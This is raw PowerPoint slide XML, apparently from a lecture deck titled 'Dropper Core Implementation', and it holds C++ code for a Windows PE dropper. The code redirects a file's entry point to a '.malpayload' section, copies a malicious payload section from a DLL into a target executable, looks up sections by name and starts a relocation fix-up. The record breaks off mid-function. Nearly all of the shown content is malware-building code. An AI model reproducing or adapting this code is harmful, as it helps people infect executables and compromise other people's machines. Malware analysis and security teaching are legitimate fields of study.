                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	OptHeader(FileBase)-&gt;AddressOfEntryPoint = StartOffset +</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		GetSection(FileBase, ".malpayload")-&gt;VirtualAddress;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="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118171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Dropper Core Implementation-Copy malicious payload</a:t>
            </a:r>
            <a:endPar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4" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332423" y="1351915"/>
            <a:ext cx="11527155" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VOID CopySectionData(LPCSTR SectionName, LPCSTR SrcName)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// Get the base address of the malicious payload in the virtual space (dll image)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	BYTE* SrcData = (BYTE*)(GetSection(DllBase, SrcName)-&gt;VirtualAddress + DllBase);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// Get the base address of the target section in the file space </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	BYTE* DestData = (BYTE*)(GetSection(FileBase, SectionName)-&gt;PointerToRawData + FileBase);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// copy memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	memcpy(DestData, SrcData, GetSection(DllBase, SrcName)-&gt;SizeOfRawData);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="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118171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Dropper Core Implementation-Get the section address</a:t>
            </a:r>
            <a:endPar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3" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303530" y="1181735"/>
            <a:ext cx="11584940" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PIMAGE_SECTION_HEADER GetSection(DWORD Base, LPCSTR SectionName)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 1. first section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	auto SectionTable = IMAGE_FIRST_SECTION(NtHeader(Base));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 2. get the number of sections in the section table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	WORD SectionCount = FileHeader(Base)-&gt;NumberOfSections;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 3. Traverse the section table, compare section names, and return the address of the section structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	for (WORD i = 0; i &lt; SectionCount; ++i)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		// if found, return</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		if (!memcmp(SectionName, SectionTable[i].Name, strlen(SectionName) + 1))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>			return &amp;SectionTable[i];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	return nullptr;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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118171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Dropper Core Implementation-Fix reloc for the dll </a:t>
            </a:r>
            <a:endPar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4" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696085" y="1064895"/>
            <a:ext cx="8799830" cy="5323205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VOID FixReloc()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	DWORD Size = 0, OldProtect = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// retrieve the relocation table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	auto RealocTable = (PIMAGE_BASE_RELOCATION)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		ImageDirectoryEntryToData((PVOID)DllBase, TRUE, 5, &amp;Size);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// check if it has variables that need to be relocatable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	while (RealocTable-&gt;SizeOfBlock)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
